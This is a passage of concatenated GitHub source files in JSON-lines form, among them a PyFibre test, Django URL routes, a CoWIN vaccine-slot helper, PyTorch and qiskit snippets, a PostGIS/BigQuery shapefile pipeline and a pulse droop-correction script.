test_save_load_segments(self):\n self.multi_image.shg_image = self.image\n self.analyser._fibre_segments = self.fibre_segments\n self.analyser._cell_segments = self.cell_segments\n\n with TemporaryDirectory() as tmp_dir:\n self.multi_image.path = tmp_dir\n self.analyser.make_directories()\n\n self.analyser._save_segments()\n\n segments = ['test-shg_cell_segments.npy',\n 'test-shg_fibre_segments.npy']\n\n for segment in segments:\n self.assertIn(\n segment,\n os.listdir(\n os.path.join(\n tmp_dir,\n \"test-shg-pyfibre-analysis\",\n \"data\"\n )\n )\n )\n\n self.analyser._load_segments()\n\n self.assertEqual(1, len(self.analyser._fibre_segments))\n self.assertEqual(1, len(self.analyser._cell_segments))\n self.assertArrayAlmostEqual(\n self.fibre_segments[0].region.intensity_image,\n self.analyser._fibre_segments[0].region.intensity_image\n )\n self.assertArrayAlmostEqual(\n self.cell_segments[0].region.intensity_image,\n self.analyser._cell_segments[0].region.intensity_image\n )\n\n def test_save_load_databases(self):\n self.analyser._databases = tuple(\n [DataFrame()] * 4\n )\n\n with TemporaryDirectory() as tmp_dir:\n self.multi_image.path = tmp_dir\n self.analyser.make_directories()\n\n self.analyser._save_databases()\n\n databases = ['test-shg_network_metric.xls',\n 'test-shg_network_metric.h5',\n 'test-shg_fibre_metric.xls',\n 'test-shg_global_metric.xls',\n 'test-shg_fibre_metric.h5',\n 'test-shg_cell_metric.h5',\n 'test-shg_global_metric.h5',\n 'test-shg_cell_metric.xls']\n\n for database in databases:\n self.assertIn(\n database,\n os.listdir(\n os.path.join(\n tmp_dir,\n \"test-shg-pyfibre-analysis\",\n \"data\"\n )\n )\n )\n\n self.analyser._load_databases()\n\n self.assertEqual(4, len(self.analyser._databases))\n\n def test_network_analysis(self):\n\n self.assertDictEqual(\n {'nuc_thresh': 2,\n 'nuc_radius': 11,\n 'lmp_thresh': 0.15,\n 'angle_thresh': 70,\n 'r_thresh': 7},\n self.analyser.fire_parameters)\n\n self.multi_image.shg_image = self.multi_image.shg_image[:50, :50]\n\n self.analyser.network_analysis(\n sigma=self.runner.sigma,\n alpha=self.runner.alpha,\n scale=self.runner.scale,\n p_denoise=self.runner.p_denoise\n )\n\n self.assertEqual(38, self.analyser._network.number_of_nodes())\n self.assertEqual(37, self.analyser._network.number_of_edges())\n self.assertEqual(2, len(self.analyser._fibre_networks))\n\n def test_segment_analysis(self):\n\n self.assertDictEqual(\n {'min_fibre_size': 100,\n 'min_fibre_frac': 0.1,\n 'min_cell_size': 200,\n 'min_cell_frac': 0.01},\n 
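# the analyser's built-in segmentation thresholds\n 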
self.analyser.segment_parameters)\n\n def test_create_metrics(self):\n self.analyser._fibre_networks = self.fibre_networks\n self.analyser._fibre_segments = self.fibre_segments\n self.analyser._cell_segments = self.cell_segments\n\n self.analyser.create_metrics(sigma=self.runner.sigma)\n\n self.assertEqual((19,), self.analyser._databases[0].shape)\n self.assertEqual((1, 11), self.analyser._databases[1].shape)\n self.assertEqual((1, 9), self.analyser._databases[2].shape)\n\n self.assertIsInstance(self.analyser._databases[0], Series)\n for database in self.analyser._databases[1:3]:\n self.assertIsInstance(database, DataFrame)\n self.assertIsNone(self.analyser._databases[3])\n\n def test_create_figures(self):\n\n with TemporaryDirectory() as tmp_dir:\n self.multi_image.path = tmp_dir\n self.analyser.make_directories()\n\n self.analyser.create_figures()\n\n figures = ['test-shg_SHG.png',\n 'test-shg_tensor.png']\n\n for figure in figures:\n self.assertIn(\n figure,\n os.listdir(\n os.path.join(\n tmp_dir,\n \"test-shg-pyfibre-analysis\",\n \"fig\"\n )\n )\n )\n","repo_name":"franklongford/PyFibre","sub_path":"pyfibre/addons/shg_pl_trans/tests/test_shg_analyser.py","file_name":"test_shg_analyser.py","file_ext":"py","file_size_in_byte":9526,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"6593334031","text":"from django.urls import path\nfrom accounts import views\n\nurlpatterns = [\n path('login/', views.login_view, name='login_user'),\n path('logout/', views.logout_user, name='logout_user'),\n path('signup/', views.register_view, name='signup_user'),\n path('update/', views.update_user, name='update_user'),\n path('delete/', views.delete_user, name='delete_user')\n]\n","repo_name":"Timofey72/scraping_service-project","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18946047928","text":"from cowin_api import CoWinAPI\nimport pandas as pd\ncowin = CoWinAPI()\ndef myprint(arr):\n an = \"\"\n mastercount=0\n for i in arr:\n an += \"\\nName:\"+i['name']\n # an+= \"\\nSessions:\"\n # print(\"Name:\",i['name'])\n # print(\"Sessions:\")\n count=0\n for j in i['sessions']:\n if(j['available_capacity']!=0):\n count+=1\n # an += \"\\nDate\"+j['date']\n # print(\"Date\",j['date'])\n an+= \"\\nAvailable: \"+str(j['available_capacity'])\n # print(\"Available: \",j['available_capacity'])\n # print(\"Slots:\")\n # an+=\"\\nSlots:\"\n # for k in j['slots']:\n \n # an+=\"\\n\"+k\n # print(an) \n mastercount+=count\n \n if(mastercount==0):\n return \"No Available slot for given day\"\n \n return an\ndef driver(pin_code):\n # pin_code = \"326001\"\n # date = '08-05-2021' # Optional. 
Default value is today's date\n # min_age_limit = 45\n try:\n available_centers = cowin.get_availability_by_pincode(pin_code)\n except:\n available_centers = cowin.get_availability_by_district(pin_code)\n \n return myprint(available_centers['centers'])\n\n\ndef states():\n myStates = cowin.get_states()\n ans=\"\"\n for i in myStates['states']:\n ans+=\"\\n\"+str(i['state_id'])+\" \"+ i['state_name']\n return ans\ndef districts(id):\n ans=\"\"\n state_id=id\n districts = cowin.get_districts(state_id)\n for i in districts['districts']:\n ans+=\"\\n\"+str(i[\"district_id\"])+\" \"+i['district_name']\n return ans\n# print(an)\n# f = open(\"output.txt\", \"a\")\n# f.write(\"Now the file has more content!\\n\")\n# f.close()\n\n# #open and read the file after the appending:\n# f = open(\"demofile2.txt\", \"r\")\n# print(f.read())","repo_name":"picografix/covidhelpbot","sub_path":"cowin.py","file_name":"cowin.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"26773533672","text":"# encoding: utf-8\nimport torch\nimport numpy as np\n\ndef gen_data(num=1000):\n x = torch.unsqueeze(torch.linspace(-1, 1, num), dim=1) # x data (tensor), shape=(100, 1)\n y = x.pow(2) + 0.2 * torch.rand(x.size())\n y = y.mean(0)\n return x.squeeze(), y\nclass Net(torch.nn.Module):\n def __init__(self):\n super(Net,self).__init__()\n self.hidden=torch.nn.Linear(1000,10)\n self.predict=torch.nn.Linear(10,1)\n def forward(self,x):\n out=self.hidden(x)\n out=self.predict(out)\n return out\n\ndef train(x,y):\n net=Net()\n optimizer = torch.optim.SGD(net.parameters(), lr=0.01)\n for epoch in range(100):\n out=net(x)\n l=(out-y)*(out-y)\n optimizer.zero_grad()\n l.backward()\n optimizer.step()\n print(\"progress\", epoch, l.data)\n out = net(x)\n l = (out - y) * (out - y)\n print(l.data)\n\nif __name__ == '__main__':\n x, y = gen_data()\n train(x,y)","repo_name":"yuanjie-ai/tql-Python","sub_path":"ext/NN/Torch/02_TASK/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"54"} +{"seq_id":"11445397195","text":"import torch\nimport ccl_cuda\nimport time\n\n\n\nimg_3d = (torch.rand(128, 256, 256) * 255.0).to(torch.uint8).cuda()\nprint(img_3d)\nimg_2d = img_3d[0]\nprint(img_3d.shape)\n\nprint(\"ccl on gpu (12800 times) - single\")\nfor i in range(5120):\n output = ccl_cuda.ccl(img_2d)\n\nstart_time = time.time()\nfor i in range(12800):\n output = ccl_cuda.ccl(img_2d)\n numbers = torch.unique(output)\nprint(\"using time: %.2fs\" % (time.time() - start_time))\nprint(numbers)\n\n\nprint(\"ccl on gpu (12800 times) - batch\")\nfor i in range(10):\n output = ccl_cuda.ccl_batch(img_3d)\n numbers = torch.unique(output.view(128, -1), dim=1)\n\nstart_time = time.time()\nfor i in range(100):\n output = ccl_cuda.ccl_batch(img_3d)\n numbers = torch.unique(output)\nprint(numbers)\n\n\nprint(\"using time: %.2fs\" % (time.time() - start_time))","repo_name":"czczup/FAST","sub_path":"models/post_processing/ccl/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"54"} +{"seq_id":"72630563361","text":"# Modified from https://raw.githubusercontent.com/fadel/pytorch_ema/master/torch_ema/ema.py\n\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nimport torch\n\n\n# Partially based on: 
https://github.com/tensorflow/tensorflow/blob/r1.13/tensorflow/python/training/moving_averages.py\nclass ExponentialMovingAverage:\n \"\"\"\n Maintains (exponential) moving average of a set of parameters.\n \"\"\"\n\n def __init__(self, parameters, decay, use_num_updates=True):\n \"\"\"\n Args:\n parameters: Iterable of `torch.nn.Parameter`; usually the result of\n `model.parameters()`.\n decay: The exponential decay.\n use_num_updates: Whether to use number of updates when computing\n averages.\n \"\"\"\n if decay < 0.0 or decay > 1.0:\n raise ValueError('Decay must be between 0 and 1')\n self.decay = decay\n self.num_updates = 0 if use_num_updates else None\n self.shadow_params = [p.clone().detach()\n for p in parameters if p.requires_grad]\n self.collected_params = []\n\n def update(self, parameters):\n \"\"\"\n Update currently maintained parameters.\n\n Call this every time the parameters are updated, such as the result of\n the `optimizer.step()` call.\n\n Args:\n parameters: Iterable of `torch.nn.Parameter`; usually the same set of\n parameters used to initialize this object.\n \"\"\"\n decay = self.decay\n if self.num_updates is not None:\n self.num_updates += 1\n decay = min(decay, (1 + self.num_updates) / (10 + self.num_updates))\n one_minus_decay = 1.0 - decay\n with torch.no_grad():\n parameters = [p for p in parameters if p.requires_grad]\n for s_param, param in zip(self.shadow_params, parameters):\n s_param.sub_(one_minus_decay * (s_param - param))\n\n def copy_to(self, parameters):\n \"\"\"\n Copy current parameters into given collection of parameters.\n\n Args:\n parameters: Iterable of `torch.nn.Parameter`; the parameters to be\n updated with the stored moving averages.\n \"\"\"\n parameters = [p for p in parameters if p.requires_grad]\n for s_param, param in zip(self.shadow_params, parameters):\n if param.requires_grad:\n param.data.copy_(s_param.data)\n\n def store(self, parameters):\n \"\"\"\n Save the current parameters for restoring later.\n\n Args:\n parameters: Iterable of `torch.nn.Parameter`; the parameters to be\n temporarily stored.\n \"\"\"\n self.collected_params = [param.clone() for param in parameters]\n\n def restore(self, parameters):\n \"\"\"\n Restore the parameters stored with the `store` method.\n Useful to validate the model with EMA parameters without affecting the\n original optimization process. Store the parameters before the\n `copy_to` method. 
After validation (or model saving), use this to\n restore the former parameters.\n\n Args:\n parameters: Iterable of `torch.nn.Parameter`; the parameters to be\n updated with the stored parameters.\n \"\"\"\n for c_param, param in zip(self.collected_params, parameters):\n param.data.copy_(c_param.data)\n\n def state_dict(self):\n return dict(decay=self.decay, num_updates=self.num_updates,\n shadow_params=self.shadow_params)\n\n def load_state_dict(self, state_dict):\n self.decay = state_dict['decay']\n self.num_updates = state_dict['num_updates']\n self.shadow_params = state_dict['shadow_params']","repo_name":"yang-song/score_sde_pytorch","sub_path":"models/ema.py","file_name":"ema.py","file_ext":"py","file_size_in_byte":3414,"program_lang":"python","lang":"en","doc_type":"code","stars":1269,"dataset":"github-code","pt":"54"} +{"seq_id":"34455471708","text":"# Web server service implementation\nfrom http.server import HTTPServer, CGIHTTPRequestHandler\n# CGIHTTPRequestHandler - exchanges data between the client and the server; renders Python files to the browser\n# jsp or servlet files cannot be served (there is no Tomcat); everything else, e.g. JavaScript views, can be used\n\n# CGI (Common Gateway Interface): a convention for exchanging information between a web server and external programs\n# It makes it possible to build interactive web pages.\nclass Handler(CGIHTTPRequestHandler):\n cgi_directories = ['/cgi-bin'] # more than one directory can be given\n\nserv = HTTPServer(('127.0.0.1',8889), Handler)\n\n# The GET /favicon.ico HTTP/1.1\" 404 error just means the page has no favicon image\nprint('Starting web server service...')\nserv.serve_forever()","repo_name":"KHG0217/python_study","sub_path":"pypro1/pack4_http/HttpServer.py","file_name":"HttpServer.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71503984481","text":"#!/usr/bin/env python3\n\nfrom pprint import pprint\nfrom collections import deque, defaultdict\nimport itertools\nimport math\nimport sys\n\nsys.setrecursionlimit(10 ** 6)\ninput = sys.stdin.buffer.readline\nINF = float('inf')\n\nn = int(input())\nnumbers = list(map(int, input().split()))\n\n# dp[i+1][j] := number of expressions built from the first i numbers with + and - whose value is j\n# 0 <= i <= n - 2, 0 <= j <= 20\n# dp[i+1][j] = max(dp[i][j], dp[i][j+a[i]], dp[i][j-a[i]])\n\n# dp = [[0 for j in range(21)] for i in range(n)]\n\n# dp[1][numbers[0]] = 1\n\n# for i in range(n - 1):\n# for j in range(21):\n# if dp[i][j] > 0:\n# plus = j + numbers[i]\n# minus = j - numbers[i]\n# if 0 <= plus <= 20:\n# dp[i+1][plus] += dp[i][j]\n# if 0 <= minus <= 20:\n# dp[i+1][minus] += dp[i][j]\n\n# print(dp[n-1][numbers[-1]])\n\n# ---\n# dp[i][j] := number of expressions whose value is j after filling the i leftmost slots with + or -\n# a_0 + a_1 + ... 
+ a_k\n# 0 <= i <= n - 2, 0 <= j <= 20\n# dp[i][j] = dp[i-1][j+a[i]] + dp[i-1][j-a[i]]\n\ndp = [[0 for j in range(21)] for i in range(n - 1)]\n\ndp[0][numbers[0]] = 1\n\nfor i in range(1, n - 1):\n for j in range(21):\n plus = j + numbers[i]\n minus = j - numbers[i]\n if 0 <= plus <= 20:\n dp[i][j] += dp[i-1][plus]\n if 0 <= minus <= 20:\n dp[i][j] += dp[i-1][minus]\n\nprint(dp[n-2][numbers[-1]])\n","repo_name":"d-matsui/atcorder","sub_path":"100-problems/review/dinamic-programming/39-first-grader.py","file_name":"39-first-grader.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15614668544","text":"import log\nimport add_new_note\nimport changes\nimport delete\nimport view\n\n# Midterm assessment\n\n# Notes application\n\n\n# The main file, where all the features are wired together\n\n\nprint(\" Notes \")\n\nlog.wr(\"start\")\n\n\n# make_file_json.start()\n\n\ndef main():\n print(\n \"Choose what you want to do\\n1 - View notes \\n2 - Create a new note \\n3 - Delete a note \\n4 - Edit a note\\n0 - Exit \")\n\n operation = int(input(\": \"))\n print(\"\\n\\n\")\n while operation != 0:\n if operation == 1:\n view.view() # Decided to try it this way; it seems to follow the SOLID rules, please report any shortcomings\n main()\n elif operation == 2:\n add_new_note.add()\n main()\n\n elif operation == 3:\n delete.delete()\n main()\n\n elif operation == 4:\n changes.find_and_change()\n main()\n else:\n print(\"Error\\n\\n\")\n main()\n\n print(\"Bye! Bye!!\")\n log.wr2(\"close program\")\n exit()\n\n\nmain()\n","repo_name":"Saven0k/PRoject-on-python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9803281435","text":"\n# coding: utf-8\n\n# In[1]:\n\n\"\"\" Process master shapefile and store in multiple formats.\n-------------------------------------------------------------------------------\n\nAuthor: Rutger Hofste\nDate: 20181206\nKernel: python35\nDocker: rutgerhofste/gisdocker:ubuntu16.04\n\n\"\"\"\n\nSCRIPT_NAME = \"Y2018M12D06_RH_Master_Shape_V01\"\nOUTPUT_VERSION = 2\n\nNODATA_VALUE = -9999\n\nS3_INPUT_PATH = \"s3://wri-projects/Aqueduct30/processData/Y2018M12D06_RH_Master_Shape_Dissolve_01/output\"\nINPUT_FILE_NAME = \"Y2018M12D06_RH_Master_Shape_Dissolved_V01.shp\"\n\nBQ_PROJECT_ID = \"aqueduct30\"\nBQ_OUTPUT_DATASET_NAME = \"aqueduct30v01\"\n\nRDS_DATABASE_ENDPOINT = \"aqueduct30v05.cgpnumwmfcqc.eu-central-1.rds.amazonaws.com\"\nRDS_DATABASE_NAME = \"database01\"\n\nOUTPUT_TABLE_NAME = \"{}_v{:02.0f}\".format(SCRIPT_NAME,OUTPUT_VERSION).lower()\n\nec2_input_path = \"/volumes/data/{}/input_V{:02.0f}\".format(SCRIPT_NAME,OUTPUT_VERSION) \nec2_output_path = \"/volumes/data/{}/output_V{:02.0f}\".format(SCRIPT_NAME,OUTPUT_VERSION) \n\ns3_output_path = \"s3://wri-projects/Aqueduct30/processData/{}/output_V{:02.0f}/\".format(SCRIPT_NAME,OUTPUT_VERSION)\n\nprint(\"S3_INPUT_PATH: \",S3_INPUT_PATH,\n \"\\nec2_input_path: \",ec2_input_path,\n \"\\nec2_output_path: \",ec2_output_path,\n \"\\nBQ_OUTPUT_DATASET_NAME: \", BQ_OUTPUT_DATASET_NAME,\n \"\\nOUTPUT_TABLE_NAME: \",OUTPUT_TABLE_NAME,\n \"\\ns3_output_path: \", s3_output_path\n )\n\n\n# In[2]:\n\nimport time, datetime, sys\ndateString = time.strftime(\"Y%YM%mD%d\")\ntimeString = time.strftime(\"UTC %H:%M\")\nstart = 
datetime.datetime.now()\nprint(dateString,timeString)\nsys.version\n\n\n# In[3]:\n\nget_ipython().system('rm -r {ec2_input_path}')\nget_ipython().system('rm -r {ec2_output_path}')\nget_ipython().system('mkdir -p {ec2_input_path}')\nget_ipython().system('mkdir -p {ec2_output_path}')\n\n\n# In[4]:\n\nget_ipython().system('aws s3 cp {S3_INPUT_PATH} {ec2_input_path} --recursive ')\n\n\n# In[5]:\n\nimport os\nimport sqlalchemy\nimport multiprocessing\nimport pandas as pd\nimport geopandas as gpd\nimport numpy as np\nfrom google.cloud import bigquery\nfrom shapely.geometry.multipolygon import MultiPolygon\nfrom geoalchemy2 import Geometry, WKTElement\n\npd.set_option('display.max_columns', 500)\n\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = \"/.google.json\"\nos.environ[\"GOOGLE_CLOUD_PROJECT\"] = \"aqueduct30\"\nclient = bigquery.Client(project=BQ_PROJECT_ID)\n\n\n# In[6]:\n\nF = open(\"/.password\",\"r\")\npassword = F.read().splitlines()[0]\nF.close()\n\nengine = sqlalchemy.create_engine(\"postgresql://rutgerhofste:{}@{}:5432/{}\".format(password,RDS_DATABASE_ENDPOINT,RDS_DATABASE_NAME))\nconnection = engine.connect()\n\n\n# In[7]:\n\ninput_path = \"{}/{}\".format(ec2_input_path,INPUT_FILE_NAME)\n\n\n# In[8]:\n\ngdf = gpd.read_file(input_path)\n\n\n# In[9]:\n\ngdf.head()\n\n\n# In[10]:\n\ngdf.shape\n\n\n# In[11]:\n\ngdf.dtypes\n\n\n# In[12]:\n\ngdf[['pfaf_id','gid_1','aqid']] = gdf.string_id.str.split('-', expand=True)\n\n\n# In[13]:\n\ngdf.replace(\"None\",str(NODATA_VALUE),inplace=True)\n\n\n# In[14]:\n\ngdf[\"pfaf_id\"] = pd.to_numeric(gdf[\"pfaf_id\"])\ngdf[\"aqid\"] = pd.to_numeric(gdf[\"aqid\"])\n\n\n# In[15]:\n\ngdf = gdf.sort_values(\"string_id\")\n\n\n# In[16]:\n\ngdf[\"aq30_id\"] = gdf.index\n\n\n# In[17]:\n\ngdf = gdf.reindex(sorted(gdf.columns), axis=1)\n\n\n# In[18]:\n\ngdf.head()\n\n\n# In[19]:\n\ndef uploadGDFtoPostGIS(gdf,tableName,saveIndex):\n # this function uploads a polygon shapefile to table in AWS RDS. \n # It handles combined polygon/multipolygon geometry and stores it in valid multipolygon in epsg 4326.\n \n # gdf = input geoDataframe\n # tableName = postGIS table name (string)\n # saveIndex = save index column in separate column in postgresql, otherwise discarded. 
(Boolean)\n \n \n gdf[\"type\"] = gdf.geometry.geom_type \n geomTypes = [\"Polygon\",\"MultiPolygon\"]\n \n for geomType in geomTypes:\n gdfType = gdf.loc[gdf[\"type\"]== geomType]\n geomTypeLower = str.lower(geomType)\n gdfType['geom'] = gdfType['geometry'].apply(lambda x: WKTElement(x.wkt, srid=4326))\n gdfType.drop([\"geometry\",\"type\"],1, inplace=True) \n print(\"Create table temp%s\" %(geomTypeLower)) \n gdfType.to_sql(\n name = \"temp%s\" %(geomTypeLower),\n con = engine,\n if_exists='replace',\n index= saveIndex, \n dtype={'geom': Geometry(str.upper(geomType), srid= 4326)}\n )\n \n # Merge both tables and make valid\n sql = []\n sql.append(\"DROP TABLE IF EXISTS %s\" %(tableName))\n sql.append(\"ALTER TABLE temppolygon ALTER COLUMN geom type geometry(MultiPolygon, 4326) using ST_Multi(geom);\")\n sql.append(\"CREATE TABLE %s AS (SELECT * FROM temppolygon UNION SELECT * FROM tempmultipolygon);\" %(tableName))\n sql.append(\"UPDATE %s SET geom = st_makevalid(geom);\" %(tableName))\n sql.append(\"DROP TABLE temppolygon,tempmultipolygon\")\n\n for statement in sql:\n print(statement)\n result = connection.execute(statement) \n gdfFromSQL =gpd.GeoDataFrame.from_postgis(\"select * from %s\" %(tableName),connection,geom_col='geom' )\n return gdfFromSQL\n\n\n# In[20]:\n\ngdf.shape\n\n\n# In[21]:\n\ngdfFromSQL = uploadGDFtoPostGIS(gdf,OUTPUT_TABLE_NAME,False)\n\n\n# In[22]:\n\ngdfFromSQL.shape\n\n\n# In[23]:\n\ngdfFromSQL.head()\n\n\n# In[24]:\n\ndestination_table = \"{}.{}\".format(BQ_OUTPUT_DATASET_NAME,OUTPUT_TABLE_NAME)\n\n\n# In[25]:\n\ngdfFromSQL.to_gbq(destination_table=destination_table,\n project_id=BQ_PROJECT_ID,\n chunksize=1000,\n if_exists=\"replace\")\n\n\n# In[26]:\n\noutput_file_path = \"{}/{}\".format(ec2_output_path,SCRIPT_NAME)\n\n\n# In[27]:\n\ngdf.to_pickle(output_file_path + \".pkl\")\n\n\n# In[28]:\n\ngdf.to_file(output_file_path + \".shp\",driver=\"ESRI Shapefile\")\n\n\n# In[29]:\n\nget_ipython().system('aws s3 cp {ec2_output_path} {s3_output_path} --recursive')\n\n\n# In[30]:\n\nend = datetime.datetime.now()\nelapsed = end - start\nprint(elapsed)\n\n\n# Previous runs: \n# 0:01:12.245867 \n# 0:48:09.273757\n\n# In[ ]:\n\n\n\n","repo_name":"wri/Aqueduct30Docker","sub_path":"notebooks/production/Y2018M12D06_RH_Master_Shape_V01.py","file_name":"Y2018M12D06_RH_Master_Shape_V01.py","file_ext":"py","file_size_in_byte":5900,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"54"} +{"seq_id":"17868062707","text":"# Somewhat similar to the valid-IP problem; solved with backtracking\n\n# nums = input().strip()\nnums = '12'\ncur = ''\nret = []\n\n\ndef DECODE(nums, cur_result):\n if len(nums) == 0:\n ret.append(cur_result)\n t = ''\n for i in range(len(nums)):\n t += nums[i]\n if int(t) < 27:\n DECODE(nums[i+1:], cur_result + chr(int(t)-1 + ord('A')))\n else:\n t = nums[i]\n DECODE(nums[i+1:], cur_result + chr(int(t)-1 + ord('A')))\n\n\nDECODE(nums, '')\nfor i in range(len(ret)):\n print(ret[i], end='')\n if i != len(ret)-1:\n print()\n","repo_name":"Nobody0321/MyCodes","sub_path":"OJ/笔试/字节跳动_20190908第4题编码.py","file_name":"字节跳动_20190908第4题编码.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71997065443","text":"import tqdm\nfrom qiskit.dagcircuit import DAGCircuit\n\n\ndef fast_circuit_to_dag(circuit):\n dag = DAGCircuit()\n dag.name = circuit.name\n\n for qreg in circuit.qregs:\n dag.add_qreg(qreg)\n for creg in circuit.cregs:\n dag.add_creg(creg)\n\n for instruction, qargs, cargs 
in tqdm.tqdm(circuit.data, desc=\"Circuit to DAG\"):\n dag.apply_operation_back(instruction.copy(), qargs, cargs,\n instruction.condition)\n return dag","repo_name":"CantelopePeel/QQ","sub_path":"qq/qiskit_utils.py","file_name":"qiskit_utils.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17854098987","text":"from matplotlib import pyplot as plt\nfrom scipy.special import factorial\nimport numpy as np\nimport random\nplt.rcParams.update({'font.size': 13})\n\n\ndef calculate_integral(dy, uy):\n I_dy = np.sum(dy*(1/101))\n I_uy = np.sum(uy*(9/900))\n print('Integral for deformed pulses:\\n',\n 'Droop integral:', I_dy, '\\n', 'Undershoot integral:', I_uy)\n\ndef plot_pulse(x,y,name):\n plt.plot(x, y, label='Original pulse')\n plt.xlabel('Time')\n plt.ylabel('Voltage')\n plt.title(f'Ideal {name} pulse')\n plt.legend(loc='best')\n plt.grid(linestyle='dotted')\n plt.savefig(f'/home/stephy/ICECUBE/undershoot/20200519/ideal_pulse_correction/png/pulse_plot_{name}.png')\n plt.savefig(f'/home/stephy/ICECUBE/undershoot/20200519/ideal_pulse_correction/svg/pulse_plot_{name}.svg')\n #plt.show()\n plt.clf()\n plt.cla()\n plt.close()\n\ndef ideal_square_pulse():#artificial square pulse algorithm\n x = np.linspace(0,10,1001)\n up_y = Amp * np.ones(101)\n low_y = np.zeros(900)\n y = np.concatenate((up_y, low_y))\n plot_pulse(x,y,'Square')\n return y\n\ndef ideal_gaussian_pulse():#artificial gaussian pulse algorithm\n x = np.linspace(0,10,1001)\n y = Amp * np.exp(-(x-2)**2/(0.2))\n plot_pulse(x,y,'Gaussian')\n return y\n\n\ndef ideal_2gaussian_pulse():#artificial gaussian pulse algorithm\n x = np.linspace(0,10,1001)\n y = Amp*0.05*np.exp(-(x-1.5)**2/(0.2)) + Amp * np.exp(-(x-3.5)**2/(0.2))\n plot_pulse(x,y,'Gaussian')\n return y\n\ndef ideal_poisson_pulse():#artificial gaussian pulse algorithm\n x = np.linspace(0,10,1001)\n y = Amp*np.exp(-5)*np.power(5, x)/factorial(x)\n plot_pulse(x,y,'Poisson')\n return y\n\ndef noisy_gaussian_pulse():#artificial gaussian pulse algorithm\n x = np.linspace(0,10,1001)\n y = []\n for i in range(0, len(x)):\n noise = random.randrange(-10, 10, 1)\n yi = Amp * (np.exp(-(x[i]-2)**2/(0.2))+ 0.007*noise)\n y.append(yi)\n y = np.asarray(y)\n plot_pulse(x,y,'Noisy Gaussian')\n return y\n\ndef droop_pulse(int_check):#manually deforme a square pulse by a tau constant\n up_x = np.linspace(0,1.,101)#upper part of the pulse for the droop, lower for the undershoot\n low_x = np.linspace(1.01,10.,900)\n dy = Amp * np.exp(-up_x/tau)\n uy = Amp * (np.exp(-width/tau)-1)*np.exp(-(low_x-width)/tau)\n x = np.linspace(0,10,1001)\n y = np.concatenate((dy, uy))\n return x, y\n\ndef droop(int_check, ideal_pulse):\n x = np.linspace(0,10,1001)\n y = ideal_pulse\n dt = np.diff(x)[0] #width of time slice\n A = (tau/dt) * (1-np.exp(-dt/tau))\n S = 0\n X = [A*y[0]]\n for i in range(1, len(x)):\n sj = y[i-1] + S*np.exp(-dt/tau)\n xj = A*y[i] - (dt*A*A/tau)*sj\n S = sj\n X.append(xj)\n if int_check == 'True':\n #inital check for both integrals (droop and undershoot)\n '''#between 0 to 10 the integrals are: (0 to 1) 0.787103603082587, (1 to 10) -0.7793227436228078\n #between 0 to 100 the integrals are: (0 to 1) 0.787103603082587, (1 to 100) -0.7888281781410758'''\n calculate_integral(dy, uy)\n return x, X\n\ndef correct(int_check, ideal_pulse, name):\n #Algorithm to reconstruct by slices the pulse using single tau approximation\n x, y = droop(int_check, ideal_pulse)\n dt = np.diff(x)[0] #width of time 
slice\n A = (tau/dt) * (1-np.exp(-dt/tau))\n S = 0\n X0 = ideal_pulse[0]\n X = [X0]\n #get the contribution of each term X[i-1] and S*np.exp(-dt/tau)\n T1 = [(1/A)*y[0]]\n T2 = [0]\n for i in range(1, len(x)):\n sj = X[i-1] + S*np.exp(-dt/tau)\n xj = (1/A)*y[i] + (dt*A/(tau))*sj\n t1 = (1/A)*y[i]\n t2 = (dt*A/tau)*sj\n S = sj\n X.append(xj)\n T1.append(t1)\n T2.append(t2)\n\n #Plot of the drooped pulse and the correction\n plt.plot(x[1:],y[1:], label=r'drooped pulse with $\\tau=$ {}'.format(tau))\n plt.plot(x[1:], X[1:], label='Droop correction')\n plt.xlabel('Time')\n plt.ylabel('Voltage')\n plt.title('Ideal pulse correction')\n plt.legend(loc='best')\n plt.grid(linestyle='dotted')\n plt.savefig(f'/home/stephy/ICECUBE/undershoot/20200519/ideal_pulse_correction/png/pulse_correction_{name}.png')\n plt.savefig(f'/home/stephy/ICECUBE/undershoot/20200519/ideal_pulse_correction/svg/pulse_correction_{name}.svg')\n #plt.show()\n plt.clf()\n plt.cla()\n plt.close()\n\n #Plot of the contributions of each term for the correction\n plt.plot(x,T1, label=r'Term $\\frac{1}{A}\\,V_j$')\n plt.plot(x, T2, label=r'Term $\\frac{A\\,dt}{\\tau}\\,S_j$')\n plt.title('Contribution of each term to the correction')\n plt.xlabel('Time')\n plt.ylabel('Voltage')\n plt.legend(loc='best')\n plt.grid(linestyle='dotted')\n plt.savefig(f'/home/stephy/ICECUBE/undershoot/20200519/ideal_pulse_correction/png/pulse_each_term_{name}.png')\n plt.savefig(f'/home/stephy/ICECUBE/undershoot/20200519/ideal_pulse_correction/svg/pulse_each_term_{name}.svg')\n #plt.show()\n plt.clf()\n plt.cla()\n plt.close()\n\n #plot of the difference between the original pulse and the corrected\n plt.plot(x[1:], ideal_pulse[1:]-X[1:])\n plt.title('Original-Correction')\n 